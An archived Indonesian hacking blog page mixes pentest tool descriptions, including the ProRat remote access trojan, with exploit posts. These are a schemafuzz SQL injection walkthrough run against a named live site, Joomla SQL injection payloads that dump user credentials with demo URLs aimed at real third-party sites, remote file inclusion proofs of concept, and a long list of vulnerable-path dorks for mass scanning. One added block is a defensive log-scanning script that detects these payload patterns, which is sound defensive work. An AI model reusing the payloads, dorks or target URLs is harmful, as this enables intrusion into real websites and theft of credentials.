BLANKON FORENSIC: 2013

Tuesday, 24 December 2013

Blackbuntu

Blackbuntu is a penetration testing distribution designed specifically for security training students and information security practitioners.

Blackbuntu is a penetration testing distribution with the GNOME desktop environment. It is currently built on Ubuntu 10.10 and uses Back|Track as a reference. It was created as a hobby.

DotDotPwn

It's a very flexible intelligent fuzzer for discovering directory traversal vulnerabilities in software such as Web/FTP/TFTP servers and Web platforms such as CMSs, ERPs, blogs, etc. It also has a protocol-independent module that sends the desired payload to the specified host and port, and it can be used in scripts through the STDOUT module.
It's written in Perl and runs on both *NIX and Windows platforms. Fuzzing modules supported in this version:

Armitage

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

For discovery, Armitage exposes several of Metasploit’s host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets–you’ll always know which hosts you’re working with and where you have sessions.

Armitage assists with remote exploitation–providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash db_autopwn against your target database.

Requirements

To use Armitage, you need the following:

- Linux or Windows
- Java 1.6+
- Metasploit Framework 3.5+
- A configured database. Make sure you know the username, password, and host.

Hexjector

Hexjector is an open-source, cross-platform PHP script that automates site pentesting for SQL injection vulnerabilities.

Features:
1. Check for SQL injection vulnerabilities.
2. Pentest SQL injection vulnerabilities.
3. Web application firewall detector.
4. Scan for admin page.
5. Manual dump function.
6. Browser.
7. SQL injection type detection.
8. Search for vulnerable sites using Google dorks.
9. MD5 cracker.

SQL Injection With Schemafuzz

SQL Injection With Schemafuzz
=========================================================
Welcome to my tutorial by arianom KiLL-9 CrEw
Powered by kill-9.tk
==================================================================
[+] The first thing you need for hacking with schemafuzz is a Linux operating system or an SSH account.
Schemafuzz is run with Python.
1. Log in to your SSH account, or open a terminal if you are using Linux
2. wget schemafuzz.py : wget http://undana.ac.id/images/upload/schemafuzz.py
3. mv schemafuzz.py f >> to shorten the command
4. python f -h >> to see the command options

> type python f -h
Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk
Modes:
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

1. python f --findcol -u "www.site.com/news.php?id=22"
2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db
5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass
6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt


[x] Penetrating the target. OK, let's look for a target........
target found: http://akperpasuruan.com/index.php?list=berita&de=14

1. First step: --findcol [find the column length]

[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&de=14"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14--
[+] Evasion Used: "+" "--"
[+] 16:55:12
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

2. Second step: --info [view the database]

[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 16:56:57
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: akperpas_db
User: akperpas_bagus@localhost
Version: 5.0.91-community

[+] Do we have Access to MySQL Database: No
[+] Do we have Access to Load_File: No

[-] 16:57:23
[-] Total URL Requests 3
[-] Done

The full version can be downloaded here
Requested by Mas Jhony for the schemafuzz tutorial

[x] Greats:
All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You

Remote Administrator with ProRat

ProRat is one of the RATs (Remote Administration Tools) widely used to take over computer systems. The tool, made by PRO Group, a Turkish hacker community, can be used to hack computers on a network. Using ProRat is quite simple: you enter the IP (Internet Protocol) address of the target computer and then connect through an open port. The hardest part is finding an open port, but you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc.


Here are the features provided by PRORAT:

- Remote Control
- Viewing System Info, application running and the Task Manager
- Add process, file, or download files
- Admin FTP
- Format the HDD (hard disk damage)
- Remotely download
- Running MS-DOS, Batch Script, VBScript
- Adding a Registry Entry
- Keylogger: Password Recording
- Take screenshots, see the Windows desktop instantly
- Send messages and chat
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

DVWA Web Hacking

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tools based on PHP/MySQL. DVWA is an option for beginners who want to learn web hacking techniques from scratch, and a range of web attack techniques can be practised with it. Besides being easy to use, lightweight and complete, DVWA runs on a local server (localhost) using WAMP/XAMPP/LAMP and others.

DVWA includes web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Joomla Component com_jsjobs Multiple SQL injection

#############################################################################################################
## Joomla Component com_jsjobs Multiple SQL injection vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : december 9, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.joomshark.com/
[+] Download : http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23:js-jobs
[+] version : 1.0.5.6
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jsjobs"
[+] LOCATION : INDONESIA - JOGJA
[+] Note : this extension have 2 categories .. free and commercial :D
[+] price : 20$
#############################################################################################################

[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=[INDONESIANCODER]

http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--

[ Demo ]

http://jsjobsdemo.joomshark.com/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=-666+union+all+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

http://www.vacaturezoektcv.nl/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Dad, Mom, little sibling, I love you to the fullest ..
[+] happy corruption day :D ..
[+] Tukulesto : keep exploitinggggggggggg ...
[+] Gh4mb4S : be patient .. there will surely be results .. hahhaa
[+] where is justice in my beloved homeland ??

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM

Joomla Component MojoBlog Multiple Remote File Include vulnerability

#########################################################################
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #
## Author : kaMtiEz (kamzcrew@yahoo.com) #
## Homepage : http://www.indonesiancoder.com #
## Date : November 20, 2009 #
#########################################################################

[ Software Information ]

[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_mojo"
[+] Location : INDONESIA - JOGJA

#########################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]



http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]



[ BUG IN ]

[1] wp-comments-post.php



[2] wp-trackback.php


======================

[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');



[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');



[ FIX ]

contact me .. or aurakasih ..

Joke.. ;)
#########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] one day .. u will be mind ..
[+] woke up and tried looking for a hole .. found one too ,, :D
[+] aurakasih .. I need you .. hha
[+] uncle tukulesto, when are you coming to my city ?? hha

Joomla Component com_jphoto SQL injection vulnerability

#############################################################################################################
## Joomla Component com_jphoto SQL injection vulnerability - (id) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : december 9, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.corephp.com/
[+] Download : http://www.corephp.com/component/option,com_rokdownloads/Itemid,100132/view,folder/ ( register first to download )
[+] About : http://www.corephp.com/jphoto/about.html
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jphoto"
[+] LOCATION : INDONESIA - JOGJA
[+] price : -
#############################################################################################################
[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jphoto&view=category&id=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

[ Demo ]

http://demo.davisservicesgroup.com/index.php?option=com_jphoto&view=category&id=-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--&Itemid=137

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Dad, Mom, little sibling, I love you to the fullest ..
[+] happy corruption day :D ..
[+] syalalala ...

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM

Mamboleto Joomla! component Remote File Include Vulnerability

/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulnerability
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : December 10, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] New Mamboleto 2.0 RC3 for Joomla! 1.5.x in "legacy mode".
Much improved, with two more banks (Sicredi and Bancoob) and a new integration module for VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================
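
Added example, not part of the original posts: a log-triage script that flags the two request shapes quoted on this page, UNION SELECT probes such as those in the schemafuzz run and the com_jsjobs/com_jphoto payloads, and remote URLs passed in include-path parameters such as mosConfig_absolute_path (MojoBlog, Mamboleto). The log lines, client addresses and files.example.net are constructed, and the parameter-name heuristic (names ending in path, dir or root) is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines; addresses and hosts are documentation values.
# The payload shapes follow the requests quoted in the posts on this page.
SAMPLE_LOG = '''\
203.0.113.7 - - [09/Dec/2009:16:55:12 +0000] "GET /index.php?list=berita&de=14 HTTP/1.1" 200 5120
203.0.113.7 - - [09/Dec/2009:16:55:14 +0000] "GET /index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3-- HTTP/1.1" 200 5207
203.0.113.7 - - [09/Dec/2009:16:56:57 +0000] "GET /index.php?option=com_jphoto&view=category&id=-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--&Itemid=137 HTTP/1.1" 200 9001
198.51.100.23 - - [10/Dec/2009:03:10:01 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=http://files.example.net/r.txt? HTTP/1.1" 200 312
198.51.100.23 - - [10/Dec/2009:03:10:05 +0000] "GET /components/com_mojo/wp-trackback.php?mosConfig_absolute_path=%68ttp%3A%2F%2Ffiles.example.net%2Fr.txt%3F HTTP/1.1" 404 210
192.0.2.44 - - [10/Dec/2009:08:00:00 +0000] "GET /index.php?option=com_content&return=http://www.example.org/ HTTP/1.1" 200 4000
'''

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b(?P<rest>.*)', re.I | re.S)
LIST_END_RE = re.compile(r'\sfrom\s|--|/\*', re.I)
REMOTE_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php)://|data:)', re.I)
# Assumption: include-path parameters tend to end in path/dir/root, as
# mosConfig_absolute_path, phpbb_root_path and includedir on this page do.
INCLUDE_PARAM_RE = re.compile(r'(?:path|dir|root)$', re.I)
MARKERS = ('information_schema', 'jos_users', 'concat_ws', '@@version',
           'version()', 'load_file')


def union_columns(value):
    """Split the first UNION SELECT list into its column expressions."""
    match = UNION_RE.search(value)
    if not match:
        return []
    select_list = LIST_END_RE.split(match.group('rest'), maxsplit=1)[0]
    columns, current, depth = [], '', 0
    for ch in select_list:
        if ch == ',' and depth == 0:        # a top-level comma ends a column
            columns.append(current.strip())
            current = ''
            continue
        depth += (ch == '(') - (ch == ')')  # commas inside concat_ws(...) do not count
        current += ch
    columns.append(current.strip())
    return columns


def classify(target):
    """Return (kind, parameter, detail) findings for one request target."""
    findings = []
    query = target.partition('?')[2]
    # parse_qsl undoes both '+' and %XX encoding, so '%68ttp%3A' is seen as 'http:'.
    # Inline-comment evasion (/**/ between keywords) is not normalised here.
    for name, value in parse_qsl(query, keep_blank_values=True):
        columns = union_columns(value)
        if columns:
            seen = [m for m in MARKERS if m in value.lower()]
            findings.append(('sqli-union', name,
                             {'columns': len(columns), 'markers': seen}))
        if REMOTE_RE.match(value) and INCLUDE_PARAM_RE.search(name):
            findings.append(('rfi', name, {'remote': value}))
    return findings


def scan(log_text):
    """Return (client_ip, status, kind, parameter, detail) for each finding."""
    results = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        for kind, param, detail in classify(match.group('target')):
            results.append((match.group('ip'), int(match.group('status')),
                            kind, param, detail))
    return results


if __name__ == '__main__':
    for ip, status, kind, param, detail in scan(SAMPLE_LOG):
        print(f'{ip} status={status} {kind} param={param} {detail}')
```

The status code is kept in each finding because a 200 on a flagged request deserves a closer look than a 404 for a component that is not installed. The column count on a sqli-union finding shows whether the client was still probing or had already matched the query's column layout.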

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM – KILL-9 CREW – MainHack Brotherhood – ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ]

[>] FOR MALINGSIAL

[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : watch out, there's a workman =))
[+] arianom says : Collect Coins for Prita Mulyasari !!!
[+] Pathloader says : Okay then, if that's h… h… h… how it is :D
[+] tiw0L says : Don't eat it pleaseeeeee!!!
[+] kaMtiEz says : I am not HOMO <++++ That's slander, he just won't admit it :p

Oscommerce Online Merchant v2.2

Recode by arianom

[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date : 30-05-2010
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Remote File Upload
[$] Vendor : http://www.oscommerce.com
[$] Google Dork : n/a
[%] vulnerable file: /admin/file_manager.php
[$] Exploit: Download

Note:Open and edit script,
Change http://kill-9.org with your website target.
Then upload to shell or hosting. Run it and Resolve to the Target.
Good Luck,,Bro

Greats : All Kill-9 Crew and IndonesianCoder Team , Malang-Cyber Crew and You

Bug-Dork

!scan /ws/login.php?includedir= WebCalendar

!scan /ws/login.php?includedir= WebCalendar v0.9.45

!scan ocp-103/index.php?req_path= ocPortal

!scan images/evil.php?owned= e107

!scan index.php?module=PostWrap&page= PostNuke PostWrap

!scan mcNews/admin/header.php?skinfile= mcNews

!scan inc/download_center_lite.inc.php?script_root= "Download Center Lite"

!scan zboard/zboard.php?id= Zeroboard

!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez

!scan include/SQuery/gameSpy2.php?libpath= intitle:"Autonomous LAN party"

!scan event.php?myevent_path= MyEvent

!scan index.php?page= "Internet PhotoShow"

!scan mod/authent.php4?rootpath= RechnungsZentrale

!scan about.php?DFORUM_PATH= dForum

!scan post.php?DFORUM_PATH= dForum

!scan movie_cls.php?full_path= Built2Go

!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:"toplist.php" "powered by phpbb"

!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"

!scan /master.php?root_path= inurl:/system/article/alltopics.php

!scan /master.php?root_path= inurl:/system/user/index.php

!scan includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"

!scan /classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss"

!scan /classes/adodbt/sql.php?classes_dir= "powered By Limbo CMS"

!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"

!scan agenda.php3?rootagenda= "Powered by phpMyAgenda"

!scan agenda2.php3?rootagenda= "Powered by phpMyAgenda"

!scan show.php?path= inurl:"fclick.php?"

!scan eshow.php?Config_rootdir= "powered by Albinator"

!scan auction/auction_common.php?phpbb_root_path= intext:"phpbb - auction"

!scan auction/auction_common.php?phpbb_root_path= inurl:auction

!scan visible_count_inc.php?statitpath= inurl:visible

!scan index.php?inc_dir= "Powered by TotalCalendar"

!scan /phpdig/includes/config.php?relative_script_path= "JetBox CMS"

!scan embed/day.php?path= intitle:"Login to Calendar"

!scan includes/dbal.php?eqdkp_root_path= "powered by EQdkp"

!scan claroline/auth/ldap/authldap.php?includePath= Dokeos

!scan /direct.php?rf= "ActualScripts, Company. All rights reserved."

!scan /config.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"

!scan addsite.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"

!scan auth/auth.php?phpbb_root_path= phpRaid

!scan auth/auth_phpbb/phpbb_root_path= phpRaid

!scan includes/pafiledb_constants.php?module_root_path= PafileDB

!scan index.php?phpbb_root_path= "Powered by foing"

!scan extras/poll/poll.php?file_newsportal= "TR Newsportal" brought by TRanx.

!scan cart_content.php?cart_isp_root= inurl:/squirrelcart/

!scan ezusermanager_pwd_forgott.php?ezUserManager_Path= "powered by ezUserManager"

!scan includes/class_template.php?quezza_root_path= "Quezza BB"

!scan sources/news.php?CONFIG[main_path]= "Powered By ScozNews"

!scan classified_right.php?language_dir= phpbazar

!scan cron.php?ROOT_PATH= "powered by phpmydirectory"

!scan cron.php?ROOT_PATH= intext:"2001-2006 phpMyDirectory.com"

!scan reconfig.php?GLOBALS[CLPath]= "CaLogic Calendars"

!scan srxclr.php?GLOBALS[CLPath]= "CaLogic Calendars"

!scan sources/post.php?fil_config= "Fusion News"

!scan addpost_newpoll.php?addpoll=preview&thispath= allinurl:/ubbthreads/

!scan BE_config.php?_PSL[classdir]= "Back-End CMS"

!scan /index.php?site_path= "Powered by SocketMail"

!scan vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]= V-Webmail

!scan includes/mailaccess/pop3.php?CONFIG[pear_dir]= V-Webmail

!scan DOCEBO205/modules/credits/help.php?lang= "Docebo LMS"

!scan cached.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"

!scan jsview.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"

!scan auth.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"

!scan manager/frontinc/prepend.php?_PX_config[manager_path]= "Plume CMS"

!scan admin/lib_action_step.php?GLOBALS[CLASS_PATH]= "Hot Open Tickets"

!scan p-popupgallery.php?l= "F@cile Interactive Web"

!scan ubbt.inc.php?GLOBALS[thispath]= UBBThreads

!scan ubbt.inc.php?thispath= UBBThreads

!scan language/lang_english/lang_activity.php?phpbb_root_path= Activity MOD Plus phpBB

!scan blend_data/blend_common.php?phpbb_root_path= "Blend Portal"

!scan suche/search.php?config[fsBase]= "Fastpublish CMS"

!scan drucken.php?config[fsBase]= "Fastpublish CMS"

!scan includes/common.php?root_path= gnopaste

!scan error.php?default_path= "Ottoman CMS"

!scan app/edocument/edocument_basic_view_menu.php?system_path= metajour

!scan app/eproject/eproject_basic_view_menu.php?system_path= metajour

!scan app/erek/erek_basic_view_menu.php?system_path= metajour

!scan extension/article/article.class.php?system_path= metajour

!scan extension/search/search.class.php?system_path= metajour

!scan admin/menu.php?root_path= "AssoCIateD CMS"

!scan includes/webdav/server.php?bhconfig[bhfilepath]= Bytehoard

!scan include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]= "Redaxo CMS"

!scan class/Wiki/Wiki.php?c_node[class_path]= Igloo

!scan ashheadlines.php?pathtoashnews= "powered by ashnews"

!scan ashnews.php?pathtoashnews= "powered by ashnews"

!scan admin/common-menu.php?CONF[local_path]= Informium

!scan modules/Forums/admin/index.php?phpbb_root_path= PHP-Nuke

!scan modules/Forums/admin/admin_words.php?phpbb_root_path= PHP-Nuke

!scan modules/Forums/admin/admin_smilies.php?phpbb_root_path= PHP-Nuke

!scan modules/Forums/admin/admin_users.php?phpbb_root_path= "PHP-Nuke"

!scan applications/faq/Bs_Faq.class.php?APP[path][applications]= "BlueShoes Framework"

!scan applications/filemanager/file.php?APP[path][core]= "BlueShoes Framework"

!scan inc/logincheck.inc.php?path= Webspotblogging

!scan inc/global.php?path= Webspotblogging

!scan classes/phpmailer/class.cs_phpmailer.php?classes_dir= Powered by CS-Cart - Shopping Cart Software

!scan /index.php?file_path= "dotwidget Printer-friendly"

!scan /includes/common.inc?file_path= "dotwidget Printer-friendly"

!scan /auth.cookie.inc.php?da_path= "powered by DreamAccount"

!scan /auth.header.inc.php?da_path= "powered by DreamAccount"

!scan _wk/wk_lang.php?WK[wkPath]= Wikiwig

!scan contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]= OpenEMR

!scan sources/post.php?fil_config= Xtreme/Ditto News

!scan class/jpcache/jpcache.php?_PSL[classdir]= "Back-end CMS"

!scan dialogs/td.php?spaw_root= cms-bandits

!scan dialogs/img.php?spaw_root= cms-bandits

!scan footer.php?absolutepath= "Enterprise Payroll Systems"

!scan admin/footer.php?absolutepath= "Enterprise Payroll Systems"

!scan phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH= PHPCodeCabinet

!scan calendar.php?cfg_dir= "Visual Events Calendar" <-- good

!scan includes/usercp_register.php?phpbb_root_path= ZoneX 1.0.3 - Publishers Gold Edition <-- good

!scan lib/auth.inc.php?INIT_PATH= docpile:we

!scan article-raw.php?file_newsportal= phNNTP

!scan genpage-cgi.php?REP_INC= Hitweb

!scan CheckUpload.php?Language= "Cwfm-0.9.1"

!scan boitenews4/index.php?url_index= "Boite de News"

!scan common.inc.php?CFG[libdir]= "PgMarket"

!scan owimg.php3?path= "See-Commerce"

!scan tags.php?BBCodeFile= Tagger

!scan examples/image.php?image= "powered by twg"

!scan examples/examples/image.php2?image= "powered by twg"

!scan include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="

!scan src/Login.php?page= "Spaminator"

!scan config.php?root_path= Thatware <--- good

!scan index.php?page= SaveWebPortal

!scan inc/header.inc.php?ficStyle= phpPrintAnalyzer

!scan Classes/Event_for_month.php?_BASE= Chaussette

!scan install/install3.php?database=none&cabsolute_path= "WEBInsta Mailing list manager"

!scan BaseLoader.php?glConf[path_libraries]= MVCnPHP

!scan includes/session.php?wb_class_dir= Wheatblog

!scan index.php?templates_dir= "WEBinsta CMS" <-- good

!scan common.php?rootdir= projectbutler

!scan inc/indexhead.php?fileloc= discloser

!scan modules/usersonline/users.php?module_dir= "WEBinsta CMS" <-- good

!scan lib/specialdays.php?path_pre= "PHProjekt"

!scan lib/dbman_filter.inc.php?lib_path= "PHProjekt"

!scan classes/query.class.php?baseDir= dotProject

!scan include/urights.php?CRM_inc= Outreach Project Tool

!scan system/includes/pageheaderdefault.inc.php?_sysSessionPath= IRSR - Invisionix Roaming System Remote

!scan s03.php?shopid= powergap

!scan administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"

!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"

!scan handlers/email/mod.listmail.php?_PM_[path][handler]= PHlyMail Lite

!scan app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= phpCodeGenie

!scan administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= inurl:"com_kochsuite"

!scan plugins/1_Adressbuch/delete.php?folder= Sonium Enterprise Adressbook

!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage

!scan admin/autoprompter.php?CONFIG[BASE_PATH]= Cce-interact

!scan includes/common.inc.php?CONFIG[BASE_PATH]= Cce-interact

!scan include/novalib/class.novaEdit.mysql.php?TNLIB_DIR= Tutti Nova

!scan news.php?CONFIG[script_path]= Fantastic News

!scan include/yapbb_session.php?GLOBALS[includeBit]=devilteam&cfgIncludeDirectory= YapBB

!scan local/lib/lcUser.php?LIBDIR= "Local Calendar"

!scan ?langage= EPNadmin

